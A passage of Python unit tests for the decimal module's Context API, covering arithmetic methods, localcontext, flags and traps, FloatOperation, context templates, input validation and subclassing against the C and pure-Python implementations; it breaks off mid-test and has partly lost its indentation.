d = c.log10(Decimal(10))
self.assertEqual(c.log10(10), d)
self.assertRaises(TypeError, c.log10, '10')
def test_logb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logb(Decimal(10))
self.assertEqual(c.logb(10), d)
self.assertRaises(TypeError, c.logb, '10')
def test_logical_and(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_and(Decimal(1), Decimal(1))
self.assertEqual(c.logical_and(1, 1), d)
self.assertEqual(c.logical_and(Decimal(1), 1), d)
self.assertEqual(c.logical_and(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_and, '1', 1)
self.assertRaises(TypeError, c.logical_and, 1, '1')
def test_logical_invert(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_invert(Decimal(1000))
self.assertEqual(c.logical_invert(1000), d)
self.assertRaises(TypeError, c.logical_invert, '1000')
def test_logical_or(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_or(Decimal(1), Decimal(1))
self.assertEqual(c.logical_or(1, 1), d)
self.assertEqual(c.logical_or(Decimal(1), 1), d)
self.assertEqual(c.logical_or(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_or, '1', 1)
self.assertRaises(TypeError, c.logical_or, 1, '1')
def test_logical_xor(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_xor(Decimal(1), Decimal(1))
self.assertEqual(c.logical_xor(1, 1), d)
self.assertEqual(c.logical_xor(Decimal(1), 1), d)
self.assertEqual(c.logical_xor(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_xor, '1', 1)
self.assertRaises(TypeError, c.logical_xor, 1, '1')
def test_max(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max(Decimal(1), Decimal(2))
self.assertEqual(c.max(1, 2), d)
self.assertEqual(c.max(Decimal(1), 2), d)
self.assertEqual(c.max(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max, '1', 2)
self.assertRaises(TypeError, c.max, 1, '2')
def test_max_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max_mag(Decimal(1), Decimal(2))
self.assertEqual(c.max_mag(1, 2), d)
self.assertEqual(c.max_mag(Decimal(1), 2), d)
self.assertEqual(c.max_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max_mag, '1', 2)
self.assertRaises(TypeError, c.max_mag, 1, '2')
def test_min(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min(Decimal(1), Decimal(2))
self.assertEqual(c.min(1, 2), d)
self.assertEqual(c.min(Decimal(1), 2), d)
self.assertEqual(c.min(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min, '1', 2)
self.assertRaises(TypeError, c.min, 1, '2')
def test_min_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min_mag(Decimal(1), Decimal(2))
self.assertEqual(c.min_mag(1, 2), d)
self.assertEqual(c.min_mag(Decimal(1), 2), d)
self.assertEqual(c.min_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min_mag, '1', 2)
self.assertRaises(TypeError, c.min_mag, 1, '2')
def test_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.minus(Decimal(10))
self.assertEqual(c.minus(10), d)
self.assertRaises(TypeError, c.minus, '10')
def test_multiply(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.multiply(Decimal(1), Decimal(2))
self.assertEqual(c.multiply(1, 2), d)
self.assertEqual(c.multiply(Decimal(1), 2), d)
self.assertEqual(c.multiply(1, Decimal(2)), d)
self.assertRaises(TypeError, c.multiply, '1', 2)
self.assertRaises(TypeError, c.multiply, 1, '2')
def test_next_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_minus(Decimal(10))
self.assertEqual(c.next_minus(10), d)
self.assertRaises(TypeError, c.next_minus, '10')
def test_next_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_plus(Decimal(10))
self.assertEqual(c.next_plus(10), d)
self.assertRaises(TypeError, c.next_plus, '10')
def test_next_toward(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_toward(Decimal(1), Decimal(2))
self.assertEqual(c.next_toward(1, 2), d)
self.assertEqual(c.next_toward(Decimal(1), 2), d)
self.assertEqual(c.next_toward(1, Decimal(2)), d)
self.assertRaises(TypeError, c.next_toward, '1', 2)
self.assertRaises(TypeError, c.next_toward, 1, '2')
def test_normalize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.normalize(Decimal(10))
self.assertEqual(c.normalize(10), d)
self.assertRaises(TypeError, c.normalize, '10')
def test_number_class(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
self.assertEqual(c.number_class(123), c.number_class(Decimal(123)))
self.assertEqual(c.number_class(0), c.number_class(Decimal(0)))
self.assertEqual(c.number_class(-45), c.number_class(Decimal(-45)))
def test_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.plus(Decimal(10))
self.assertEqual(c.plus(10), d)
self.assertRaises(TypeError, c.plus, '10')
def test_power(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.power(Decimal(1), Decimal(4))
self.assertEqual(c.power(1, 4), d)
self.assertEqual(c.power(Decimal(1), 4), d)
self.assertEqual(c.power(1, Decimal(4)), d)
self.assertEqual(c.power(Decimal(1), Decimal(4)), d)
self.assertRaises(TypeError, c.power, '1', 4)
self.assertRaises(TypeError, c.power, 1, '4')
self.assertEqual(c.power(modulo=5, b=8, a=2), 1)
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.quantize(Decimal(1), Decimal(2))
self.assertEqual(c.quantize(1, 2), d)
self.assertEqual(c.quantize(Decimal(1), 2), d)
self.assertEqual(c.quantize(1, Decimal(2)), d)
self.assertRaises(TypeError, c.quantize, '1', 2)
self.assertRaises(TypeError, c.quantize, 1, '2')
def test_remainder(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder(Decimal(1), Decimal(2))
self.assertEqual(c.remainder(1, 2), d)
self.assertEqual(c.remainder(Decimal(1), 2), d)
self.assertEqual(c.remainder(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder, '1', 2)
self.assertRaises(TypeError, c.remainder, 1, '2')
def test_remainder_near(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder_near(Decimal(1), Decimal(2))
self.assertEqual(c.remainder_near(1, 2), d)
self.assertEqual(c.remainder_near(Decimal(1), 2), d)
self.assertEqual(c.remainder_near(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder_near, '1', 2)
self.assertRaises(TypeError, c.remainder_near, 1, '2')
def test_rotate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.rotate(Decimal(1), Decimal(2))
self.assertEqual(c.rotate(1, 2), d)
self.assertEqual(c.rotate(Decimal(1), 2), d)
self.assertEqual(c.rotate(1, Decimal(2)), d)
self.assertRaises(TypeError, c.rotate, '1', 2)
self.assertRaises(TypeError, c.rotate, 1, '2')
def test_sqrt(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.sqrt(Decimal(10))
self.assertEqual(c.sqrt(10), d)
self.assertRaises(TypeError, c.sqrt, '10')
def test_same_quantum(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.same_quantum(Decimal(1), Decimal(2))
self.assertEqual(c.same_quantum(1, 2), d)
self.assertEqual(c.same_quantum(Decimal(1), 2), d)
self.assertEqual(c.same_quantum(1, Decimal(2)), d)
self.assertRaises(TypeError, c.same_quantum, '1', 2)
self.assertRaises(TypeError, c.same_quantum, 1, '2')
def test_scaleb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.scaleb(Decimal(1), Decimal(2))
self.assertEqual(c.scaleb(1, 2), d)
self.assertEqual(c.scaleb(Decimal(1), 2), d)
self.assertEqual(c.scaleb(1, Decimal(2)), d)
self.assertRaises(TypeError, c.scaleb, '1', 2)
self.assertRaises(TypeError, c.scaleb, 1, '2')
def test_shift(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.shift(Decimal(1), Decimal(2))
self.assertEqual(c.shift(1, 2), d)
self.assertEqual(c.shift(Decimal(1), 2), d)
self.assertEqual(c.shift(1, Decimal(2)), d)
self.assertRaises(TypeError, c.shift, '1', 2)
self.assertRaises(TypeError, c.shift, 1, '2')
def test_subtract(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.subtract(Decimal(1), Decimal(2))
self.assertEqual(c.subtract(1, 2), d)
self.assertEqual(c.subtract(Decimal(1), 2), d)
self.assertEqual(c.subtract(1, Decimal(2)), d)
self.assertRaises(TypeError, c.subtract, '1', 2)
self.assertRaises(TypeError, c.subtract, 1, '2')
def test_to_eng_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_eng_string(Decimal(10))
self.assertEqual(c.to_eng_string(10), d)
self.assertRaises(TypeError, c.to_eng_string, '10')
def test_to_sci_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_sci_string(Decimal(10))
self.assertEqual(c.to_sci_string(10), d)
self.assertRaises(TypeError, c.to_sci_string, '10')
def test_to_integral_exact(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_exact(Decimal(10))
self.assertEqual(c.to_integral_exact(10), d)
self.assertRaises(TypeError, c.to_integral_exact, '10')
def test_to_integral_value(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_value(Decimal(10))
self.assertEqual(c.to_integral_value(10), d)
self.assertRaises(TypeError, c.to_integral_value, '10')
self.assertRaises(TypeError, c.to_integral_value, 10, 'x')
class CContextAPItests(ContextAPItests):
    # Run the Context API tests against the C accelerator (_decimal).
    decimal = C
class PyContextAPItests(ContextAPItests):
    # Run the Context API tests against the pure-Python implementation.
    decimal = P
class ContextWithStatement(unittest.TestCase):
# Can't do these as docstrings until Python 2.6
# as doctest can't handle __future__ statements
def test_localcontext(self):
# Use a copy of the current context in the block
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
with localcontext() as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertIsNot(orig_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_localcontextarg(self):
# Use a copy of the supplied context in the block
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
new_ctx = Context(prec=42)
with localcontext(new_ctx) as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertEqual(set_ctx.prec, new_ctx.prec, 'did not set correct context')
self.assertIsNot(new_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_nested_with_statements(self):
# Use a copy of the supplied context in the block
Decimal = self.decimal.Decimal
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
Clamped = self.decimal.Clamped
Overflow = self.decimal.Overflow
orig_ctx = getcontext()
orig_ctx.clear_flags()
new_ctx = Context(Emax=384)
with localcontext() as c1:
self.assertEqual(c1.flags, orig_ctx.flags)
self.assertEqual(c1.traps, orig_ctx.traps)
c1.traps[Clamped] = True
c1.Emin = -383
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertRaises(Clamped, c1.create_decimal, '0e-999')
self.assertTrue(c1.flags[Clamped])
with localcontext(new_ctx) as c2:
self.assertEqual(c2.flags, new_ctx.flags)
self.assertEqual(c2.traps, new_ctx.traps)
self.assertRaises(Overflow, c2.power, Decimal('3.4e200'), 2)
self.assertFalse(c2.flags[Clamped])
self.assertTrue(c2.flags[Overflow])
del c2
self.assertFalse(c1.flags[Overflow])
del c1
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertFalse(orig_ctx.flags[Clamped])
self.assertFalse(orig_ctx.flags[Overflow])
self.assertFalse(new_ctx.flags[Clamped])
self.assertFalse(new_ctx.flags[Overflow])
def test_with_statements_gc1(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
del c1
with localcontext() as c2:
del c2
with localcontext() as c3:
del c3
with localcontext() as c4:
del c4
def test_with_statements_gc2(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
with localcontext(c1) as c2:
del c1
with localcontext(c2) as c3:
del c2
with localcontext(c3) as c4:
del c3
del c4
def test_with_statements_gc3(self):
Context = self.decimal.Context
localcontext = self.decimal.localcontext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
with localcontext() as c1:
del c1
n1 = Context(prec=1)
setcontext(n1)
with localcontext(n1) as c2:
del n1
self.assertEqual(c2.prec, 1)
del c2
n2 = Context(prec=2)
setcontext(n2)
del n2
self.assertEqual(getcontext().prec, 2)
n3 = Context(prec=3)
setcontext(n3)
self.assertEqual(getcontext().prec, 3)
with localcontext(n3) as c3:
del n3
self.assertEqual(c3.prec, 3)
del c3
n4 = Context(prec=4)
setcontext(n4)
del n4
self.assertEqual(getcontext().prec, 4)
with localcontext() as c4:
self.assertEqual(c4.prec, 4)
del c4
class CContextWithStatement(ContextWithStatement):
    # Run the with-statement tests against the C accelerator (_decimal).
    decimal = C
class PyContextWithStatement(ContextWithStatement):
    # Run the with-statement tests against the pure-Python implementation.
    decimal = P
class ContextFlags(unittest.TestCase):
    """Tests for the interaction of Context.flags/traps with operations,
    comparisons against plain dicts, and the FloatOperation signal."""

    def test_flags_irrelevant(self):
        # check that the result (numeric result + flags raised) of an
        # arithmetic operation doesn't depend on the current flags
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        Inexact = self.decimal.Inexact
        Rounded = self.decimal.Rounded
        Underflow = self.decimal.Underflow
        Clamped = self.decimal.Clamped
        Subnormal = self.decimal.Subnormal

        def raise_error(context, flag):
            # The C implementation has no _raise_error helper, so set the
            # flag by hand and honor the trap explicitly.
            if self.decimal == C:
                context.flags[flag] = True
                if context.traps[flag]:
                    raise flag
            else:
                context._raise_error(flag)

        context = Context(prec=9, Emin = -425000000, Emax = 425000000,
                          rounding=ROUND_HALF_EVEN, traps=[], flags=[])

        # operations that raise various flags, in the form (function, arglist)
        operations = [
            (context._apply, [Decimal("100E-425000010")]),
            (context.sqrt, [Decimal(2)]),
            (context.add, [Decimal("1.23456789"), Decimal("9.87654321")]),
            (context.multiply, [Decimal("1.23456789"), Decimal("9.87654321")]),
            (context.subtract, [Decimal("1.23456789"), Decimal("9.87654321")]),
            ]

        # try various flags individually, then a whole lot at once
        flagsets = [[Inexact], [Rounded], [Underflow], [Clamped], [Subnormal],
                    [Inexact, Rounded, Underflow, Clamped, Subnormal]]

        for fn, args in operations:
            # find answer and flags raised using a clean context
            context.clear_flags()
            ans = fn(*args)
            flags = [k for k, v in context.flags.items() if v]

            for extra_flags in flagsets:
                # set flags, before calling operation
                context.clear_flags()
                for flag in extra_flags:
                    raise_error(context, flag)
                new_ans = fn(*args)

                # flags that we expect to be set after the operation
                expected_flags = list(flags)
                for flag in extra_flags:
                    if flag not in expected_flags:
                        expected_flags.append(flag)
                # Sort by id so both lists use the same (arbitrary but
                # consistent) ordering before comparison.
                expected_flags.sort(key=id)

                # flags we actually got
                new_flags = [k for k,v in context.flags.items() if v]
                new_flags.sort(key=id)

                self.assertEqual(ans, new_ans,
                                 "operation produces different answers depending on flags set: " +
                                 "expected %s, got %s." % (ans, new_ans))
                self.assertEqual(new_flags, expected_flags,
                                 "operation raises different flags depending on flags set: " +
                                 "expected %s, got %s" % (expected_flags, new_flags))

    def test_flag_comparisons(self):
        # flags/traps compare like dicts, both to each other and to
        # plain dicts with the same keys.
        Context = self.decimal.Context
        Inexact = self.decimal.Inexact
        Rounded = self.decimal.Rounded

        c = Context()

        # Valid SignalDict
        self.assertNotEqual(c.flags, c.traps)
        self.assertNotEqual(c.traps, c.flags)

        c.flags = c.traps
        self.assertEqual(c.flags, c.traps)
        self.assertEqual(c.traps, c.flags)

        c.flags[Rounded] = True
        c.traps = c.flags
        self.assertEqual(c.flags, c.traps)
        self.assertEqual(c.traps, c.flags)

        d = {}
        d.update(c.flags)
        self.assertEqual(d, c.flags)
        self.assertEqual(c.flags, d)

        d[Inexact] = True
        self.assertNotEqual(d, c.flags)
        self.assertNotEqual(c.flags, d)

        # Invalid SignalDict
        d = {Inexact:False}
        self.assertNotEqual(d, c.flags)
        self.assertNotEqual(c.flags, d)

        d = ["xyz"]
        self.assertNotEqual(d, c.flags)
        self.assertNotEqual(c.flags, d)

    @requires_IEEE_754
    def test_float_operation(self):
        # FloatOperation: implicit float->Decimal conversion sets the
        # flag (and raises when trapped); the explicit from_float
        # constructors never signal.
        Decimal = self.decimal.Decimal
        FloatOperation = self.decimal.FloatOperation
        localcontext = self.decimal.localcontext

        with localcontext() as c:
            ##### trap is off by default
            self.assertFalse(c.traps[FloatOperation])

            # implicit conversion sets the flag
            c.clear_flags()
            self.assertEqual(Decimal(7.5), 7.5)
            self.assertTrue(c.flags[FloatOperation])

            c.clear_flags()
            self.assertEqual(c.create_decimal(7.5), 7.5)
            self.assertTrue(c.flags[FloatOperation])

            # explicit conversion does not set the flag
            c.clear_flags()
            x = Decimal.from_float(7.5)
            self.assertFalse(c.flags[FloatOperation])
            # comparison sets the flag
            self.assertEqual(x, 7.5)
            self.assertTrue(c.flags[FloatOperation])

            c.clear_flags()
            x = c.create_decimal_from_float(7.5)
            self.assertFalse(c.flags[FloatOperation])
            self.assertEqual(x, 7.5)
            self.assertTrue(c.flags[FloatOperation])

            ##### set the trap
            c.traps[FloatOperation] = True

            # implicit conversion raises
            c.clear_flags()
            self.assertRaises(FloatOperation, Decimal, 7.5)
            self.assertTrue(c.flags[FloatOperation])

            c.clear_flags()
            self.assertRaises(FloatOperation, c.create_decimal, 7.5)
            self.assertTrue(c.flags[FloatOperation])

            # explicit conversion is silent
            c.clear_flags()
            x = Decimal.from_float(7.5)
            self.assertFalse(c.flags[FloatOperation])

            c.clear_flags()
            x = c.create_decimal_from_float(7.5)
            self.assertFalse(c.flags[FloatOperation])

    def test_float_comparison(self):
        # Mixed Decimal/float comparisons always set FloatOperation;
        # ordering comparisons additionally raise when the trap is set,
        # while (in)equality only sets the flag.
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        FloatOperation = self.decimal.FloatOperation
        localcontext = self.decimal.localcontext

        def assert_attr(a, b, attr, context, signal=None):
            context.clear_flags()
            f = getattr(a, attr)
            if signal == FloatOperation:
                self.assertRaises(signal, f, b)
            else:
                self.assertIs(f(b), True)
            self.assertTrue(context.flags[FloatOperation])

        small_d = Decimal('0.25')
        big_d = Decimal('3.0')
        small_f = 0.25
        big_f = 3.0

        zero_d = Decimal('0.0')
        neg_zero_d = Decimal('-0.0')
        zero_f = 0.0
        neg_zero_f = -0.0

        inf_d = Decimal('Infinity')
        neg_inf_d = Decimal('-Infinity')
        inf_f = float('inf')
        neg_inf_f = float('-inf')

        def doit(c, signal=None):
            # Order
            for attr in '__lt__', '__le__':
                assert_attr(small_d, big_f, attr, c, signal)

            for attr in '__gt__', '__ge__':
                assert_attr(big_d, small_f, attr, c, signal)

            # Equality
            assert_attr(small_d, small_f, '__eq__', c, None)

            assert_attr(neg_zero_d, neg_zero_f, '__eq__', c, None)
            assert_attr(neg_zero_d, zero_f, '__eq__', c, None)

            assert_attr(zero_d, neg_zero_f, '__eq__', c, None)
            assert_attr(zero_d, zero_f, '__eq__', c, None)

            assert_attr(neg_inf_d, neg_inf_f, '__eq__', c, None)
            assert_attr(inf_d, inf_f, '__eq__', c, None)

            # Inequality
            assert_attr(small_d, big_f, '__ne__', c, None)

            assert_attr(Decimal('0.1'), 0.1, '__ne__', c, None)

            assert_attr(neg_inf_d, inf_f, '__ne__', c, None)
            assert_attr(inf_d, neg_inf_f, '__ne__', c, None)

            assert_attr(Decimal('NaN'), float('nan'), '__ne__', c, None)

        def test_containers(c, signal=None):
            # Container membership/sorting implicitly compare and so
            # also set the flag (and raise for ordering when trapped).
            c.clear_flags()
            s = set([100.0, Decimal('100.0')])
            self.assertEqual(len(s), 1)
            self.assertTrue(c.flags[FloatOperation])

            c.clear_flags()
            if signal:
                self.assertRaises(signal, sorted, [1.0, Decimal('10.0')])
            else:
                s = sorted([10.0, Decimal('10.0')])
            self.assertTrue(c.flags[FloatOperation])

            c.clear_flags()
            b = 10.0 in [Decimal('10.0'), 1.0]
            self.assertTrue(c.flags[FloatOperation])

            c.clear_flags()
            b = 10.0 in {Decimal('10.0'):'a', 1.0:'b'}
            self.assertTrue(c.flags[FloatOperation])

        nc = Context()
        with localcontext(nc) as c:
            self.assertFalse(c.traps[FloatOperation])
            doit(c, signal=None)
            test_containers(c, signal=None)

            c.traps[FloatOperation] = True
            doit(c, signal=FloatOperation)
            test_containers(c, signal=FloatOperation)

    def test_float_operation_default(self):
        # FloatOperation is neither set nor trapped by default, but can
        # be trapped explicitly like any other signal.
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        Inexact = self.decimal.Inexact
        FloatOperation= self.decimal.FloatOperation

        context = Context()
        self.assertFalse(context.flags[FloatOperation])
        self.assertFalse(context.traps[FloatOperation])

        context.clear_traps()
        context.traps[Inexact] = True
        context.traps[FloatOperation] = True
        self.assertTrue(context.traps[FloatOperation])
        self.assertTrue(context.traps[Inexact])
class CContextFlags(ContextFlags):
    # Run the flags/traps tests against the C accelerator (_decimal).
    decimal = C
class PyContextFlags(ContextFlags):
    # Run the flags/traps tests against the pure-Python implementation.
    decimal = P
class SpecialContexts(unittest.TestCase):
    """Test the context templates."""

    def test_context_templates(self):
        # BasicContext/ExtendedContext are shared module-level templates:
        # setcontext() must install a *copy*, and attribute changes made
        # to a template must show up in subsequent copies.
        BasicContext = self.decimal.BasicContext
        ExtendedContext = self.decimal.ExtendedContext
        getcontext = self.decimal.getcontext
        setcontext = self.decimal.setcontext
        InvalidOperation = self.decimal.InvalidOperation
        DivisionByZero = self.decimal.DivisionByZero
        Overflow = self.decimal.Overflow
        Underflow = self.decimal.Underflow
        Clamped = self.decimal.Clamped

        assert_signals(self, BasicContext, 'traps',
            [InvalidOperation, DivisionByZero, Overflow, Underflow, Clamped]
        )

        savecontext = getcontext().copy()
        basic_context_prec = BasicContext.prec
        extended_context_prec = ExtendedContext.prec

        ex = None
        try:
            BasicContext.prec = ExtendedContext.prec = 441
            for template in BasicContext, ExtendedContext:
                setcontext(template)
                c = getcontext()
                self.assertIsNot(c, template)
                self.assertEqual(c.prec, 441)
        except Exception as e:
            # Remember the failure class so cleanup still runs before
            # re-raising below.
            ex = e.__class__
        finally:
            # Restore the templates and the thread's context no matter what.
            BasicContext.prec = basic_context_prec
            ExtendedContext.prec = extended_context_prec
            setcontext(savecontext)
        if ex:
            raise ex

    def test_default_context(self):
        # DefaultContext changes affect contexts installed afterwards,
        # but never the context already active in this thread.
        DefaultContext = self.decimal.DefaultContext
        BasicContext = self.decimal.BasicContext
        ExtendedContext = self.decimal.ExtendedContext
        getcontext = self.decimal.getcontext
        setcontext = self.decimal.setcontext
        InvalidOperation = self.decimal.InvalidOperation
        DivisionByZero = self.decimal.DivisionByZero
        Overflow = self.decimal.Overflow

        self.assertEqual(BasicContext.prec, 9)
        self.assertEqual(ExtendedContext.prec, 9)

        assert_signals(self, DefaultContext, 'traps',
            [InvalidOperation, DivisionByZero, Overflow]
        )

        savecontext = getcontext().copy()
        default_context_prec = DefaultContext.prec

        ex = None
        try:
            c = getcontext()
            saveprec = c.prec

            DefaultContext.prec = 961
            c = getcontext()
            # The already-installed context is unaffected ...
            self.assertEqual(c.prec, saveprec)

            # ... but installing the template picks up the new precision.
            setcontext(DefaultContext)
            c = getcontext()
            self.assertIsNot(c, DefaultContext)
            self.assertEqual(c.prec, 961)
        except Exception as e:
            ex = e.__class__
        finally:
            DefaultContext.prec = default_context_prec
            setcontext(savecontext)
        if ex:
            raise ex
class CSpecialContexts(SpecialContexts):
    # Run the context-template tests against the C accelerator (_decimal).
    decimal = C
class PySpecialContexts(SpecialContexts):
    # Run the context-template tests against the pure-Python implementation.
    decimal = P
class ContextInputValidation(unittest.TestCase):
    """Validation of Context attribute assignment and constructor args."""

    def test_invalid_context(self):
        Context = self.decimal.Context
        DefaultContext = self.decimal.DefaultContext

        c = DefaultContext.copy()

        # prec, Emax
        for attr in ['prec', 'Emax']:
            setattr(c, attr, 999999)
            self.assertEqual(getattr(c, attr), 999999)
            self.assertRaises(ValueError, setattr, c, attr, -1)
            self.assertRaises(TypeError, setattr, c, attr, 'xyz')

        # Emin
        setattr(c, 'Emin', -999999)
        self.assertEqual(getattr(c, 'Emin'), -999999)
        self.assertRaises(ValueError, setattr, c, 'Emin', 1)
        self.assertRaises(TypeError, setattr, c, 'Emin', (1,2,3))

        # rounding: must be one of the rounding-mode strings
        self.assertRaises(TypeError, setattr, c, 'rounding', -1)
        self.assertRaises(TypeError, setattr, c, 'rounding', 9)
        self.assertRaises(TypeError, setattr, c, 'rounding', 1.0)
        self.assertRaises(TypeError, setattr, c, 'rounding', 'xyz')

        # capitals, clamp
        for attr in ['capitals', 'clamp']:
            self.assertRaises(ValueError, setattr, c, attr, -1)
            self.assertRaises(ValueError, setattr, c, attr, 2)
            self.assertRaises(TypeError, setattr, c, attr, [1,2,3])

        # Invalid attribute
        self.assertRaises(AttributeError, setattr, c, 'emax', 100)

        # Invalid signal dict
        self.assertRaises(TypeError, setattr, c, 'flags', [])
        self.assertRaises(KeyError, setattr, c, 'flags', {})
        self.assertRaises(KeyError, setattr, c, 'traps',
                          {'InvalidOperation':0})

        # Attributes cannot be deleted
        for attr in ['prec', 'Emax', 'Emin', 'rounding', 'capitals', 'clamp',
                     'flags', 'traps']:
            self.assertRaises(AttributeError, c.__delattr__, attr)

        # Invalid attributes
        self.assertRaises(TypeError, getattr, c, 9)
        self.assertRaises(TypeError, setattr, c, 9)

        # Invalid values in constructor
        self.assertRaises(TypeError, Context, rounding=999999)
        self.assertRaises(TypeError, Context, rounding='xyz')
        self.assertRaises(ValueError, Context, clamp=2)
        self.assertRaises(ValueError, Context, capitals=-1)
        self.assertRaises(KeyError, Context, flags=["P"])
        self.assertRaises(KeyError, Context, traps=["Q"])

        # Type error in conversion
        self.assertRaises(TypeError, Context, flags=(0,1))
        self.assertRaises(TypeError, Context, traps=(1,0))
class CContextInputValidation(ContextInputValidation):
    # Run the input-validation tests against the C accelerator (_decimal).
    decimal = C
class PyContextInputValidation(ContextInputValidation):
    # Run the input-validation tests against the pure-Python implementation.
    decimal = P
class ContextSubclassing(unittest.TestCase):
    """A Context subclass with a keyword-only style __init__ must behave
    like a regular Context for every attribute it sets."""

    def test_context_subclassing(self):
        decimal = self.decimal
        Decimal = decimal.Decimal
        Context = decimal.Context
        Clamped = decimal.Clamped
        DivisionByZero = decimal.DivisionByZero
        Inexact = decimal.Inexact
        Overflow = decimal.Overflow
        Rounded = decimal.Rounded
        Subnormal = decimal.Subnormal
        Underflow = decimal.Underflow
        InvalidOperation = decimal.InvalidOperation

        class MyContext(Context):
            # Only overrides the attributes explicitly passed; everything
            # else keeps the base Context defaults.
            def __init__(self, prec=None, rounding=None, Emin=None, Emax=None,
                               capitals=None, clamp=None, flags=None,
                               traps=None):
                Context.__init__(self)
                if prec is not None:
                    self.prec = prec
                if rounding is not None:
                    self.rounding = rounding
                if Emin is not None:
                    self.Emin = Emin
                if Emax is not None:
                    self.Emax = Emax
                if capitals is not None:
                    self.capitals = capitals
                if clamp is not None:
                    self.clamp = clamp
                if flags is not None:
                    # A list of signals is expanded into a full bool dict.
                    if isinstance(flags, list):
                        flags = {v:(v in flags) for v in OrderedSignals[decimal] + flags}
                    self.flags = flags
                if traps is not None:
                    if isinstance(traps, list):
                        traps = {v:(v in traps) for v in OrderedSignals[decimal] + traps}
                    self.traps = traps

        c = Context()
        d = MyContext()
        # With no arguments the subclass matches a default Context exactly.
        for attr in ('prec', 'rounding', 'Emin', 'Emax', 'capitals', 'clamp',
                     'flags', 'traps'):
            self.assertEqual(getattr(c, attr), getattr(d, attr))

        # prec
        self.assertRaises(ValueError, MyContext, **{'prec':-1})
        c = MyContext(prec=1)
        self.assertEqual(c.prec, 1)
        self.assertRaises(InvalidOperation, c.quantize, Decimal('9e2'), 0)

        # rounding
        self.assertRaises(TypeError, MyContext, **{'rounding':'XYZ'})
        c = MyContext(rounding=ROUND_DOWN, prec=1)
        self.assertEqual(c.rounding, ROUND_DOWN)
        self.assertEqual(c.plus(Decimal('9.9')), 9)

        # Emin
        self.assertRaises(ValueError, MyContext, **{'Emin':5})
        c = MyContext(Emin=-1, prec=1)
        self.assertEqual(c.Emin, -1)
        x = c.add(Decimal('1e-99'), Decimal('2.234e-2000'))
        self.assertEqual(x, Decimal('0.0'))
        for signal in (Inexact, Underflow, Subnormal, Rounded, Clamped):
            self.assertTrue(c.flags[signal])

        # Emax
        self.assertRaises(ValueError, MyContext, **{'Emax':-1})
        c = MyContext(Emax=1, prec=1)
        self.assertEqual(c.Emax, 1)
        self.assertRaises(Overflow, c.add, Decimal('1e99'), Decimal('2.234e2000'))
        if self.decimal == C:
